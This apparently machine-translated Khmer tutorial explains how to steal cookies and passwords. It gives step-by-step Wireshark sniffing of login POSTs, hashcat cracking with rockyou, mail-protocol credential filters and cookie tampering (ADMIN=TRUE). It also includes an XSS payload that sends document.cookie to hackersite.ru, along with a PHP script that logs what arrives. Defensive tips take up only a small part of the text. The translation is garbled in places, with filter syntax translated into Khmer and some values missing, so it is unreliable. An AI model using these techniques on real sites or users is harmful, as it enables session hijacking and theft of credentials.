វិធីងាយស្រួលក្នុងការលួចខូឃី។ វិធីសាស្រ្តក្នុងការលួច cookies របៀបស្ទាក់ចាប់ cookies

អ្នកប្រើប្រាស់ជាច្រើនមិនបានដឹងថាដោយការបំពេញការចូល និងពាក្យសម្ងាត់នៅពេលចុះឈ្មោះ ឬផ្តល់សិទ្ធិលើធនធានអ៊ីនធឺណិតដែលបិទហើយចុច ENTER ទិន្នន័យនេះអាចស្ទាក់ចាប់បានយ៉ាងងាយស្រួល។ ជាញឹកញាប់ពួកវាត្រូវបានបញ្ជូនតាមបណ្តាញក្នុងទម្រង់មិនមានសុវត្ថិភាព។ ដូច្នេះ ប្រសិនបើគេហទំព័រដែលអ្នកកំពុងព្យាយាមចូលប្រើពិធីការ HTTP នោះវាងាយស្រួលណាស់ក្នុងការចាប់យកចរាចរនេះ វិភាគវាដោយប្រើ Wireshark ហើយបន្ទាប់មកប្រើតម្រង និងកម្មវិធីពិសេសដើម្បីស្វែងរក និងឌិគ្រីបពាក្យសម្ងាត់។

កន្លែងដ៏ល្អបំផុតដើម្បីស្ទាក់ចាប់ពាក្យសម្ងាត់គឺជាស្នូលនៃបណ្តាញ ដែលចរាចរណ៍របស់អ្នកប្រើប្រាស់ទាំងអស់ទៅកាន់ធនធានបិទ (ឧទាហរណ៍ សំបុត្រ) ឬនៅពីមុខរ៉ោតទ័រ ដើម្បីចូលប្រើអ៊ីនធឺណិត នៅពេលចុះឈ្មោះលើធនធានខាងក្រៅ។ យើងរៀបចំកញ្ចក់មួយ ហើយយើងត្រៀមខ្លួនជាស្រេចដើម្បីមានអារម្មណ៍ថាដូចជាពួក Hacker ។

ជំហានទី 1. ដំឡើង និងបើកដំណើរការ Wireshark ដើម្បីចាប់យកចរាចរណ៍

ពេលខ្លះដើម្បីធ្វើវា វាគ្រប់គ្រាន់ក្នុងការជ្រើសរើសតែចំណុចប្រទាក់ដែលយើងមានគម្រោងចាប់យកចរាចរណ៍ ហើយចុចប៊ូតុងចាប់ផ្តើម។ ក្នុងករណីរបស់យើង យើងកំពុងចាប់យកតាមរយៈបណ្តាញឥតខ្សែ។

ការចាប់យកចរាចរណ៍បានចាប់ផ្តើម។

ជំហាន​ទី 2. ត្រង​ការ​ចាប់​យក​ចរាចរណ៍ POST

យើងបើកកម្មវិធីរុករកហើយព្យាយាមចូលទៅក្នុងធនធានមួយចំនួនដោយប្រើឈ្មោះអ្នកប្រើនិងពាក្យសម្ងាត់។ នៅពេលដែលដំណើរការអនុញ្ញាតត្រូវបានបញ្ចប់ ហើយគេហទំព័រត្រូវបានបើក យើងឈប់ចាប់យកចរាចរណ៍នៅក្នុង Wireshark ។ បន្ទាប់មកបើកកម្មវិធីវិភាគពិធីការ ហើយឃើញកញ្ចប់ព័ត៌មានមួយចំនួនធំ។ នេះ​ជា​កន្លែង​ដែល​អ្នក​ជំនាញ​ព័ត៌មានវិទ្យា​ភាគច្រើន​បោះបង់​ចោល​ព្រោះ​ពួកគេ​មិន​ដឹង​ថា​ត្រូវ​ធ្វើ​អ្វី​បន្ទាប់។ ប៉ុន្តែយើងដឹង និងចាប់អារម្មណ៍លើកញ្ចប់ជាក់លាក់ដែលមានទិន្នន័យ POST ដែលត្រូវបានបង្កើតនៅលើម៉ាស៊ីនមូលដ្ឋានរបស់យើង នៅពេលបំពេញទម្រង់នៅលើអេក្រង់ ហើយផ្ញើទៅកាន់ម៉ាស៊ីនមេពីចម្ងាយ នៅពេលយើងចុចប៊ូតុង "ចូល" ឬ "ការអនុញ្ញាត" នៅក្នុងកម្មវិធីរុករក។

យើងបញ្ចូលតម្រងពិសេសនៅក្នុងបង្អួចដើម្បីបង្ហាញកញ្ចប់ព័ត៌មានដែលបានចាប់យក៖ http.សំណើ។វិធីសាស្រ្ត == "ប្រកាស"

ហើយយើងឃើញ ជំនួសឱ្យកញ្ចប់រាប់ពាន់ វាមានតែមួយជាមួយទិន្នន័យដែលយើងកំពុងស្វែងរក។

ជំហានទី 3. ស្វែងរកការចូល និងពាក្យសម្ងាត់របស់អ្នកប្រើ

ចុចកណ្ដុរស្ដាំយ៉ាងលឿន ហើយជ្រើសរើសធាតុពីម៉ឺនុយ អនុវត្តតាម TCP Steam


បន្ទាប់ពីនេះ អត្ថបទនឹងបង្ហាញនៅក្នុងបង្អួចថ្មីដែលស្ដារមាតិកានៃទំព័រនៅក្នុងកូដ។ ចូរយើងស្វែងរកវាល "ពាក្យសម្ងាត់" និង "អ្នកប្រើប្រាស់" ដែលត្រូវនឹងពាក្យសម្ងាត់ និងឈ្មោះអ្នកប្រើប្រាស់។ ក្នុងករណីខ្លះ វាលទាំងពីរនឹងអាចអានបានយ៉ាងងាយស្រួល និងមិនអាចអ៊ិនគ្រីបបាន ប៉ុន្តែប្រសិនបើយើងកំពុងព្យាយាមចាប់យកចរាចរណ៍នៅពេលចូលប្រើធនធានល្បីៗដូចជា Mail.ru, Facebook, VKontakte ជាដើម នោះពាក្យសម្ងាត់នឹងត្រូវបានអ៊ិនគ្រីប៖

HTTP/1.1 302 បានរកឃើញ

ម៉ាស៊ីនមេ៖ Apache/2.2.15 (CentOS)

X-Powered-ដោយ៖ PHP/5.3.3

P3P: CP="NOI ADM DEV PSAi COM NAV OTRO STP របស់យើងនៅក្នុង DEM"

Set-Cookie: password= ; ផុតកំណត់=Thu, 07-Nov-2024 23:52:21 GMT; ផ្លូវ =/

ទីតាំង៖ loggedin.php

ប្រវែងខ្លឹមសារ៖ ០

ការតភ្ជាប់: បិទ

ប្រភេទមាតិកា៖ អត្ថបទ/html; សំណុំតួអក្សរ = UTF-8

ដូច្នេះក្នុងករណីរបស់យើង៖

ឈ្មោះអ្នកប្រើប្រាស់៖ networkguru

ពាក្យសម្ងាត់៖

ជំហានទី 4. កំណត់ប្រភេទការអ៊ិនកូដដើម្បីឌិគ្រីបពាក្យសម្ងាត់

ជាឧទាហរណ៍ សូមចូលទៅកាន់គេហទំព័រ http://www.onlinehashcrack.com/hash-identification.php#res ហើយបញ្ចូលពាក្យសម្ងាត់របស់យើងនៅក្នុងបង្អួចកំណត់អត្តសញ្ញាណ។ ខ្ញុំត្រូវបានផ្តល់បញ្ជីនៃពិធីការអ៊ិនកូដតាមលំដាប់អាទិភាព៖

ជំហាន 5. ការឌិគ្រីបពាក្យសម្ងាត់អ្នកប្រើប្រាស់

នៅដំណាក់កាលនេះយើងអាចប្រើឧបករណ៍ប្រើប្រាស់ hashcat៖

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

នៅទិន្នផលយើងបានទទួលពាក្យសម្ងាត់ដែលបានឌិគ្រីប: simplepassword

ដូច្នេះ ដោយមានជំនួយពី Wireshark យើងមិនត្រឹមតែអាចដោះស្រាយបញ្ហាក្នុងប្រតិបត្តិការនៃកម្មវិធី និងសេវាកម្មប៉ុណ្ណោះទេ ប៉ុន្តែថែមទាំងសាកល្បងខ្លួនយើងជាពួក Hacker ស្ទាក់ចាប់ពាក្យសម្ងាត់ដែលអ្នកប្រើប្រាស់បញ្ចូលក្នុងទម្រង់គេហទំព័រ។ អ្នកក៏អាចស្វែងរកពាក្យសម្ងាត់សម្រាប់ប្រអប់សំបុត្ររបស់អ្នកប្រើដោយប្រើតម្រងសាមញ្ញដើម្បីបង្ហាញ៖

  • ពិធីការ និងតម្រង POP មើលទៅដូចនេះ៖ pop.request.command == "USER" || pop.request.command == "PASS"
  • ពិធីការ IMAP និងតម្រងនឹងមានៈ imap.request មាន "ចូល"
  • ពិធីការគឺ SMTP ហើយអ្នកនឹងត្រូវបញ្ចូលតម្រងខាងក្រោម៖ smtp.req.command == "AUTH"

និងឧបករណ៍ប្រើប្រាស់ដ៏ធ្ងន់ធ្ងរបន្ថែមទៀតសម្រាប់ការឌិគ្រីបពិធីការអ៊ិនកូដ។

ជំហានទី 6៖ ចុះបើចរាចរណ៍ត្រូវបានអ៊ិនគ្រីប និងប្រើ HTTPS?

មានជម្រើសជាច្រើនដើម្បីឆ្លើយសំណួរនេះ។

ជម្រើសទី 1. ភ្ជាប់នៅពេលដែលការតភ្ជាប់រវាងអ្នកប្រើប្រាស់ និងម៉ាស៊ីនមេត្រូវបានខូច ហើយចាប់យកចរាចរនៅពេលការតភ្ជាប់ត្រូវបានបង្កើតឡើង (SSL Handshake)។ នៅពេលដែលការតភ្ជាប់ត្រូវបានបង្កើតឡើង សោសម័យអាចត្រូវបានស្ទាក់ចាប់។

ជម្រើសទី 2៖ អ្នកអាចឌិគ្រីបចរាចរណ៍ HTTPS ដោយប្រើឯកសារកំណត់ចំណាំវគ្គដែលកត់ត្រាដោយ Firefox ឬ Chrome ។ ដើម្បីធ្វើដូច្នេះ កម្មវិធីរុករកត្រូវតែកំណត់រចនាសម្ព័ន្ធដើម្បីសរសេរសោអ៊ិនគ្រីបទាំងនេះទៅកាន់ឯកសារកំណត់ហេតុ (ឧទាហរណ៍ផ្អែកលើ FireFox) ហើយអ្នកគួរតែទទួលបានឯកសារកំណត់ហេតុនោះ។ សំខាន់ អ្នកត្រូវលួចឯកសារ Session key ពី hard drive របស់អ្នកប្រើផ្សេង (ដែលខុសច្បាប់)។ ជាការប្រសើរណាស់ បន្ទាប់មកចាប់យកចរាចរណ៍ ហើយប្រើសោលទ្ធផលដើម្បីឌិគ្រីបវា។

ការបំភ្លឺ។យើងកំពុងនិយាយអំពីកម្មវិធីរុករកតាមអ៊ីនធឺណិតរបស់មនុស្សដែលមានពាក្យសម្ងាត់ដែលពួកគេកំពុងព្យាយាមលួច។ ប្រសិនបើយើងមានន័យថា ឌិគ្រីបចរាចរណ៍ HTTPS ផ្ទាល់ខ្លួនរបស់យើង ហើយចង់អនុវត្ត នោះយុទ្ធសាស្ត្រនេះនឹងដំណើរការ។ ប្រសិនបើអ្នកកំពុងព្យាយាមឌិគ្រីបចរាចរ HTTPS របស់អ្នកប្រើប្រាស់ផ្សេងទៀតដោយមិនមានសិទ្ធិចូលប្រើកុំព្យូទ័ររបស់ពួកគេ នោះវានឹងមិនដំណើរការទេ នោះគឺទាំងការអ៊ិនគ្រីប និងឯកជនភាព។

បន្ទាប់ពីទទួលបានសោយោងទៅតាមជម្រើស 1 ឬ 2 អ្នកត្រូវចុះឈ្មោះពួកវានៅក្នុង WireShark៖

  1. ចូលទៅកាន់ម៉ឺនុយកែសម្រួល - ចំណូលចិត្ត - ពិធីការ - SSL ។
  2. កំណត់ទង់ "ប្រមូលផ្តុំកំណត់ត្រា SSL ឡើងវិញដែលលាតសន្ធឹងផ្នែក TCP ច្រើន" ។
  3. "បញ្ជីគ្រាប់ចុច RSA" ហើយចុចកែសម្រួល។
  4. បញ្ចូលទិន្នន័យក្នុងវាលទាំងអស់ ហើយសរសេរផ្លូវក្នុងឯកសារដោយប្រើគ្រាប់ចុច

រូបភាពបង្ហាញថាខូគីមានបន្ទាត់ wordpress_logged_in_263d663a02379b7624b1028a58464038=admin។ តម្លៃនេះស្ថិតនៅក្នុងទម្រង់ដែលមិនបានអ៊ិនគ្រីបនៅក្នុងខូគី ហើយអាចស្ទាក់ចាប់បានយ៉ាងងាយស្រួលដោយប្រើឧបករណ៍ប្រើប្រាស់ Achilles ប៉ុន្តែក្នុងករណីភាគច្រើននៅក្នុង Achilles អ្នកអាចមើលឃើញតែសញ្ញានៃធាតុជាក់លាក់ប៉ុណ្ណោះ។ មុនពេលផ្ញើសំណើទៅម៉ាស៊ីនមេ អ្នកអាចព្យាយាមជំនួសបន្ទាត់នេះដោយស្រដៀងគ្នាណាមួយ (ទោះបីជាក្នុងករណីនេះវាគ្មានចំណុចក៏ដោយ) - ចំនួននៃការព្យាយាមមិនត្រូវបានកំណត់ទេ។ បន្ទាប់មក តាមរយៈការផ្ញើសំណើនេះទៅកាន់ម៉ាស៊ីនមេដោយប្រើប៊ូតុងផ្ញើ អ្នកអាចទទួលបានការឆ្លើយតបពីម៉ាស៊ីនមេដែលមានបំណងសម្រាប់អ្នកគ្រប់គ្រង។

ក្នុងឧទាហរណ៍មុន អ្នកអាចប្រើការក្លែងបន្លំលេខសម្គាល់អ្នកប្រើប្រាស់ដោយផ្ទាល់។ លើសពីនេះ ឈ្មោះនៃប៉ារ៉ាម៉ែត្រដែលការជំនួសតម្លៃផ្តល់ឱកាសបន្ថែមសម្រាប់អ្នកលួចចូល អាចមានដូចខាងក្រោម៖ អ្នកប្រើប្រាស់ (ឧទាហរណ៍ USER=JDOE) កន្សោមណាមួយដែលមានលេខសម្គាល់ (ឧទាហរណ៍ USER=JDOE ឬ SESSIONID= BLAHBLAH), អ្នកគ្រប់គ្រង (ឧទាហរណ៍ ADMIN= TRUE), សម័យ (ឧទាហរណ៍ SESSION=ACTIVE), រទេះ (ឧទាហរណ៍ CART=FULL) ក៏ដូចជាកន្សោមដូចជា TRUE, FALSE, ACTIVE, INACTIVE។ ជាធម្មតា ទ្រង់ទ្រាយនៃខូគីគឺពឹងផ្អែកខ្លាំងលើកម្មវិធីដែលពួកវាត្រូវបានប្រើ។ ទោះជាយ៉ាងណាក៏ដោយ គន្លឹះទាំងនេះសម្រាប់ការស្វែងរកគុណវិបត្តិនៃកម្មវិធីដោយប្រើខូគីអនុវត្តចំពោះទម្រង់ស្ទើរតែទាំងអស់។

វិធានការប្រឆាំងភាគីអតិថិជនប្រឆាំងនឹងការទាញយកខូគី

ជាទូទៅ អ្នកប្រើប្រាស់គួរតែប្រយ័ត្នចំពោះគេហទំព័រដែលប្រើខូឃីសម្រាប់ការផ្ទៀងផ្ទាត់ និងរក្សាទុកទិន្នន័យរសើប។ វាក៏ចាំបាច់ផងដែរក្នុងការចងចាំថាគេហទំព័រដែលប្រើខូគីសម្រាប់ការផ្ទៀងផ្ទាត់ត្រូវតែគាំទ្រយ៉ាងហោចណាស់ពិធីការ SSL ដើម្បីអ៊ិនគ្រីបឈ្មោះអ្នកប្រើប្រាស់ និងពាក្យសម្ងាត់ ចាប់តាំងពីអវត្តមាននៃពិធីការនេះ ទិន្នន័យត្រូវបានបញ្ជូនដោយមិនបានអ៊ិនគ្រីប ដែលធ្វើឱ្យវាអាចស្ទាក់ចាប់វាបាន។ ដោយប្រើឧបករណ៍កម្មវិធីសាមញ្ញដើម្បីមើលទិន្នន័យដែលត្រូវបានបញ្ជូនតាមបណ្តាញ។

កម្មវិធី Kookaburra បានបង្កើតឧបករណ៍មួយដើម្បីជួយសម្រួលដល់ការប្រើប្រាស់ខូគី។ ឧបករណ៍នេះត្រូវបានគេហៅថា CookiePal ( http://www.kburra.com/cpal.html (សូមមើល www.kburra.com)) កម្មវិធីនេះត្រូវបានរចនាឡើងដើម្បីជូនដំណឹងដល់អ្នកប្រើប្រាស់ នៅពេលដែលគេហទំព័រព្យាយាមដំឡើងខូគីនៅលើម៉ាស៊ីន ហើយអ្នកប្រើប្រាស់អាចអនុញ្ញាត ឬបដិសេធសកម្មភាពនេះ។ មុខងារទប់ស្កាត់ខូគីស្រដៀងគ្នាមាននៅក្នុងកម្មវិធីរុករកទាំងអស់សព្វថ្ងៃនេះ។

ហេតុផលមួយទៀតសម្រាប់ការដំឡើងការអាប់ដេតកម្មវិធីរុករកតាមអ៊ីនធឺណិតជាទៀងទាត់គឺថាកំហុសសុវត្ថិភាពនៅក្នុងកម្មវិធីទាំងនេះត្រូវបានសម្គាល់ជានិច្ច។ ដូច្នេះ Bennet Haselton និង Jamie McCarthy បានបង្កើតស្គ្រីបដែលបន្ទាប់ពីចុចលើតំណទាញយកខូឃីពីម៉ាស៊ីនរបស់អតិថិជន។ ជាលទ្ធផល មាតិកាទាំងអស់នៃខូគីដែលមាននៅលើម៉ាស៊ីនរបស់អ្នកប្រើប្រាស់ក្លាយជាមាន។

ប្រភេទនៃការ hack នេះក៏អាចត្រូវបានធ្វើដោយប្រើចំណុចទាញផងដែរ។

ដើម្បីធានាថារឿងបែបនេះមិនគំរាមកំហែងដល់ទិន្នន័យផ្ទាល់ខ្លួនរបស់យើងទេ ខ្ញុំធ្វើវាដោយខ្លួនឯង ហើយណែនាំអ្នកគ្រប់គ្នាឱ្យធ្វើបច្ចុប្បន្នភាពកម្មវិធីដែលដំណើរការជាមួយកូដ HTML ជានិច្ច (កម្មវិធីអ៊ីមែល កម្មវិធីចាក់មេឌៀ កម្មវិធីរុករក។ ល។ )។

មនុស្សជាច្រើនចូលចិត្តបិទខូគី ប៉ុន្តែគេហទំព័រភាគច្រើនទាមទារឱ្យរកមើលខូគី។ សេចក្តីសន្និដ្ឋាន - ប្រសិនបើនៅពេលអនាគតដ៏ខ្លីខាងមុខ បច្ចេកវិទ្យាច្នៃប្រឌិតមួយលេចឡើងដែលអនុញ្ញាតឱ្យអ្នកធ្វើដោយគ្មានខូគី អ្នកសរសេរកម្មវិធី និងអ្នកគ្រប់គ្រងនឹងដកដង្ហើមធំ ប៉ុន្តែសម្រាប់ពេលនេះខូឃីនៅតែជាអាហារដ៏ឆ្ងាញ់សម្រាប់អ្នកលួចស្តាប់! នេះជាការពិត ដោយសារជម្រើសដែលប្រសើរជាងនេះមិនទាន់មាននៅឡើយ។

វិធានការប្រឆាំងខាងម៉ាស៊ីនមេ

ក្នុងករណីមានការណែនាំសម្រាប់ការធានាសុវត្ថិភាពម៉ាស៊ីនមេ អ្នកជំនាញផ្តល់ដំបូន្មានដ៏សាមញ្ញមួយ៖ កុំប្រើយន្តការខូគី លុះត្រាតែចាំបាច់! ការយកចិត្តទុកដាក់ជាពិសេសត្រូវតែធ្វើឡើងនៅពេលប្រើខូគីដែលនៅតែមាននៅលើប្រព័ន្ធរបស់អ្នកប្រើបន្ទាប់ពីការបញ្ចប់នៃវគ្គទំនាក់ទំនង។

ជាការពិតណាស់ វាជារឿងសំខាន់ក្នុងការយល់ដឹងថា ខូគីអាចត្រូវបានប្រើដើម្បីផ្តល់សុវត្ថិភាពដល់ម៉ាស៊ីនមេគេហទំព័រសម្រាប់ការផ្ទៀងផ្ទាត់អ្នកប្រើប្រាស់។ ប្រសិនបើកម្មវិធីរបស់អ្នកចាំបាច់ត្រូវប្រើខូគី អ្នកគួរតែកំណត់រចនាសម្ព័ន្ធយន្តការខូគី ដើម្បីប្រើសោដែលមានរយៈពេលខ្លីខុសៗគ្នាសម្រាប់វគ្គនីមួយៗ ហើយព្យាយាមមិនដាក់ព័ត៌មាននៅក្នុងឯកសារទាំងនេះដែលអាចត្រូវបានប្រើប្រាស់ដោយពួក Hacker សម្រាប់ការលួចចូល (ដូចជា ADMIN=TRUE) .

លើសពីនេះទៀត ដើម្បីធ្វើឱ្យការប្រើប្រាស់ខូគីរបស់អ្នកកាន់តែមានសុវត្ថិភាព អ្នកអាចប្រើការអ៊ិនគ្រីបខូគី ដើម្បីការពារព័ត៌មានរសើបពីការទាញយក។ ជាការពិតណាស់ ការអ៊ិនគ្រីបមិនដោះស្រាយបញ្ហាសុវត្ថិភាពទាំងអស់នៅពេលធ្វើការជាមួយបច្ចេកវិទ្យាខូគី ប៉ុន្តែវិធីសាស្ត្រនេះនឹងការពារការលួចចូលជាមូលដ្ឋានបំផុតដែលបានពិពណ៌នាខាងលើ។

តើខូគីជាអ្វី?

មានយន្តការមួយដែលអនុញ្ញាតឱ្យម៉ាស៊ីនមេ http រក្សាទុកព័ត៌មានអត្ថបទមួយចំនួននៅលើកុំព្យូទ័ររបស់អ្នកប្រើហើយបន្ទាប់មកចូលប្រើវា។ ព័ត៌មាននេះត្រូវបានគេហៅថាខូឃី។ សំខាន់ ខូគីនីមួយៗគឺជាគូ៖ ឈ្មោះប៉ារ៉ាម៉ែត្រ និងតម្លៃរបស់វា។ ខូគីនីមួយៗក៏ត្រូវបានចាត់តាំងដែនដែលវាជាកម្មសិទ្ធិផងដែរ។ សម្រាប់ហេតុផលសុវត្ថិភាព រាល់កម្មវិធីរុករកតាមអ៊ីនធឺណិត http ត្រូវបានអនុញ្ញាតឱ្យចូលប្រើខូគីនៃដែនរបស់វាតែប៉ុណ្ណោះ។ លើសពីនេះ ខូគីអាចមានកាលបរិច្ឆេទផុតកំណត់ ដែលក្នុងករណីនេះពួកវានឹងត្រូវបានរក្សាទុកនៅលើកុំព្យូទ័ររហូតដល់កាលបរិច្ឆេទនេះ ទោះបីជាអ្នកបិទបង្អួចកម្មវិធីរុករកតាមអ៊ីនធឺណិតទាំងអស់ក៏ដោយ។


ហេតុអ្វីបានជាខូឃីមានសារៈសំខាន់?

ប្រព័ន្ធពហុអ្នកប្រើប្រាស់ទាំងអស់ប្រើខូគីដើម្បីកំណត់អត្តសញ្ញាណអ្នកប្រើប្រាស់។ ច្បាស់ជាងនេះទៅទៀត ការតភ្ជាប់បច្ចុប្បន្នរបស់អ្នកប្រើប្រាស់ទៅនឹងសេវាកម្ម សម័យអ្នកប្រើប្រាស់។ ប្រសិនបើនរណាម្នាក់ស្គាល់ខូគីរបស់អ្នក ពួកគេនឹងអាចចូលទៅក្នុងប្រព័ន្ធជំនួសអ្នក។ ដោយសារតែនៅពេលនេះធនធានអ៊ីនធឺណិតតិចតួចណាស់ពិនិត្យមើលការផ្លាស់ប្តូរអាសយដ្ឋាន IP ក្នុងអំឡុងពេលវគ្គអ្នកប្រើប្រាស់មួយ។


តើធ្វើដូចម្តេចដើម្បីផ្លាស់ប្តូរ ឬជំនួសខូគី?

អ្នកបង្កើតកម្មវិធីរុករកមិនផ្តល់ឧបករណ៍ដែលភ្ជាប់មកជាមួយសម្រាប់កែសម្រួលខូគីទេ។ ប៉ុន្តែ​អ្នក​អាច​ទទួល​បាន​ដោយ​ប្រើ notepad ធម្មតា។


ជំហានទី 1: បង្កើតឯកសារអត្ថបទជាមួយអត្ថបទ

Windows Registry Editor កំណែ 5.00



@="C:\\IE_ext.htm"

រក្សាទុកវាក្រោមឈ្មោះ IE_ext.reg

ជំហានទី 2: ដោយប្រើឯកសារដែលបានបង្កើត បន្ថែមការផ្លាស់ប្តូរទៅបញ្ជីឈ្មោះវីនដូ។

ជំហានទី 3: បង្កើតឯកសារអត្ថបទជាមួយអត្ថបទ

< script language="javascript">
external.menuArguments.clipboardData.setData("អត្ថបទ" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
ការជូនដំណឹង(external.menuArguments.document.cookie);


រក្សាទុកវាក្រោមឈ្មោះ C:\IE_ext.htm

ជំហានទី 4: យើងចូលទៅកាន់គេហទំព័រដែលយើងចាប់អារម្មណ៍។

ជំហានទី 5: ចុចកណ្ដុរស្ដាំលើចន្លោះទទេនៅលើទំព័រ ហើយជ្រើសរើសធាតុម៉ឺនុយ "ធ្វើការជាមួយខូឃី". អនុញ្ញាតឱ្យចូលប្រើក្ដារតម្បៀតខ្ទាស់។ ខូគីរបស់អ្នកពីគេហទំព័រនេះនឹងទៅកាន់ក្ដារតម្បៀតខ្ទាស់។ អ្នកអាចបញ្ចូល notepad របស់ពួកគេ ហើយមើល។


ជំហានទី 6: ដើម្បីផ្លាស់ប្តូរខូគីមួយចំនួន កែសម្រួលឯកសារ C:\IE_ext.htm ដោយជំនួស ឈ្មោះសាកល្បងក្នុងនាមខូឃី តម្លៃសាកល្បង- នៅលើអត្ថន័យរបស់វា testdomain.ru- ទៅដែនគេហទំព័រ។ បើចាំបាច់បន្ថែមបន្ទាត់ស្រដៀងគ្នាបន្ថែមទៀត។ ដើម្បីភាពងាយស្រួលនៃការគ្រប់គ្រង ខ្ញុំបានបន្ថែមទៅស្គ្រីបនូវលទ្ធផលនៃខូគីបច្ចុប្បន្នមុន និងក្រោយការផ្លាស់ប្តូរ៖ ការជូនដំណឹង(external.menuArguments.document.cookie);

ជំហានទី 7៖ អនុវត្តជំហានទី 5 ម្តងទៀត ហើយបន្ទាប់មកធ្វើឱ្យទំព័រឡើងវិញ។

បន្ទាត់ខាងក្រោម៖ យើងនឹងចូលប្រើធនធានអ៊ីនធឺណិតនេះជាមួយនឹងខូគីដែលបានធ្វើបច្ចុប្បន្នភាព។

តើធ្វើដូចម្តេចដើម្បីលួច cookies ដោយប្រើ JavaScript?

ប្រសិនបើអ្នកវាយប្រហារអាចស្វែងរកឱកាសមួយដើម្បីដំណើរការស្គ្រីប JavaScript បំពាននៅលើកុំព្យូទ័ររបស់ជនរងគ្រោះ នោះគាត់អាចអានខូឃីបច្ចុប្បន្នបានយ៉ាងងាយស្រួល។ ឧទាហរណ៍៖


var str=document.cookie;

ប៉ុន្តែតើគាត់នឹងអាចផ្ទេរពួកវាទៅគេហទំព័ររបស់គាត់បានទេ ពីព្រោះដូចដែលខ្ញុំបានចង្អុលបង្ហាញមុននេះ ស្គ្រីប JavaScript នឹងមិនអាចចូលប្រើគេហទំព័រដែលមានទីតាំងនៅលើដែនផ្សេងដោយគ្មានការបញ្ជាក់បន្ថែមបានទេ? វាបង្ហាញថាស្គ្រីប JavaScript អាចផ្ទុករូបភាពណាមួយដែលមាននៅលើម៉ាស៊ីនមេ http ណាមួយ។ ក្នុងពេលជាមួយគ្នានេះ ផ្ទេរព័ត៌មានអត្ថបទណាមួយនៅក្នុងសំណើទាញយកទៅរូបភាពនេះ។ ឧទាហរណ៍៖ http://hackersite.ru/xss.jpg?text_infoដូច្នេះប្រសិនបើអ្នកដំណើរការកូដនេះ៖

var img = រូបភាពថ្មី ();

img.src= "http://hackersite.ru/xss.jpg ?"+ encodeURI(document.cookie);


បន្ទាប់មកខូគីនឹងបញ្ចប់ដោយការស្នើសុំដើម្បីទាញយក "រូបភាព" ហើយនឹង "ទៅ" ទៅកាន់អ្នកវាយប្រហារ។

តើធ្វើដូចម្តេចដើម្បីដោះស្រាយសំណើបែបនេះដើម្បីទាញយក "រូបភាព"?

អ្នកវាយប្រហារគ្រាន់តែត្រូវការស្វែងរក hosting ដែលមានការគាំទ្រ PHP ហើយដាក់កូដដូចនេះនៅទីនោះ៖

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

បន្ទាប់មកប៉ារ៉ាម៉ែត្រសំណើទាំងអស់សម្រាប់ស្គ្រីបនេះនឹងត្រូវបានរក្សាទុកក្នុងឯកសារ log.txt. អ្វីដែលនៅសល់គឺត្រូវជំនួសនៅក្នុងស្គ្រីប JavaScript ដែលបានពិពណ៌នាពីមុន http://hackersite.ru/xss.jpgទៅផ្លូវទៅកាន់ស្គ្រីប php នេះ។


បន្ទាត់​ខាង​ក្រោម

ខ្ញុំបានបង្ហាញតែវិធីសាមញ្ញបំផុតក្នុងការទាញយកភាពងាយរងគ្រោះ XSS ។ ប៉ុន្តែនេះបង្ហាញថា យ៉ាងហោចណាស់មានចំណុចងាយរងគ្រោះបែបនេះនៅលើគេហទំព័រអ៊ីនធឺណែតដែលមានអ្នកប្រើប្រាស់ច្រើនអាចអនុញ្ញាតឱ្យអ្នកវាយប្រហារប្រើប្រាស់ធនធានរបស់វាជំនួសអ្នក។

តើ​អ្នក​ធ្លាប់​ឆ្ងល់​ទេ​ថា​តើ​គេហទំព័រ​មួយ​ចំនួន​កំណត់​អ្នក​ចូល​មើល​របស់​ខ្លួន​ដោយ​របៀប​ណា? នេះអាចត្រូវបានបង្ហាញជាឧទាហរណ៍ ក្នុងការចងចាំខ្លឹមសារនៃ "រទេះ" (ប្រសិនបើថ្នាំងនេះមានបំណងសម្រាប់លក់ទំនិញ) ឬនៅក្នុងវិធីនៃការបំពេញវាលនៃទម្រង់មួយចំនួន។ ពិធីការ HTTP ដែលបញ្ជាក់ពីដំណើរការនៃវើលវ៉ាយវ៉េប មិនមានមធ្យោបាយដើម្បីតាមដានព្រឹត្តិការណ៍ពីការចូលមើលគេហទំព័រមួយទៅគេហទំព័រមួយទៀតទេ ដូច្នេះកម្មវិធីបន្ថែមពិសេសត្រូវបានបង្កើតឡើងដើម្បីអាចរក្សាទុក "រដ្ឋ" បែបនេះបាន។ យន្តការនេះដែលត្រូវបានពិពណ៌នានៅក្នុង RFC 2109 បញ្ចូលបំណែកពិសេសនៃទិន្នន័យខូគីទៅក្នុងសំណើ HTTP និងការឆ្លើយតបដែលអនុញ្ញាតឱ្យគេហទំព័រតាមដានអ្នកទស្សនារបស់ពួកគេ។

ទិន្នន័យខូគីអាចត្រូវបានរក្សាទុកសម្រាប់រយៈពេលនៃវគ្គទំនាក់ទំនង ( ក្នុងមួយវគ្គ) ដែលនៅសេសសល់ក្នុង RAM សម្រាប់វគ្គមួយ ហើយត្រូវបានលុបនៅពេលដែលកម្មវិធីរុករកត្រូវបានបិទ ឬសូម្បីតែបន្ទាប់ពីរយៈពេលជាក់លាក់មួយបានកន្លងផុតទៅ។ ក្នុងករណីផ្សេងទៀត ពួកវាជាអចិន្ត្រៃយ៍ ( ជាប់លាប់) នៅសល់នៅលើ hard drive របស់អ្នកប្រើជាឯកសារអត្ថបទ។ ជាធម្មតាពួកវាត្រូវបានរក្សាទុកនៅក្នុងថតខូគី (%windir%\Cookies នៅលើ Win9x និង %userprofile%\Cookies នៅលើ NT/2000)។ វាមិនពិបាកក្នុងការទាយថាបន្ទាប់ពីចាប់យកខូឃីនៅលើអ៊ីនធឺណិត អ្នកវាយប្រហារអាចក្លែងខ្លួនជាអ្នកប្រើប្រាស់កុំព្យូទ័រដែលបានផ្តល់ឱ្យ ឬប្រមូលព័ត៌មានសំខាន់ៗដែលមាននៅក្នុងឯកសារទាំងនេះ។ បន្ទាប់​ពី​បាន​អាន​ផ្នែក​ខាង​ក្រោម​នេះ អ្នក​នឹង​យល់​ថា​វា​ងាយ​ស្រួល​ធ្វើ​យ៉ាង​ណា។

ការស្ទាក់ចាប់ខូឃី

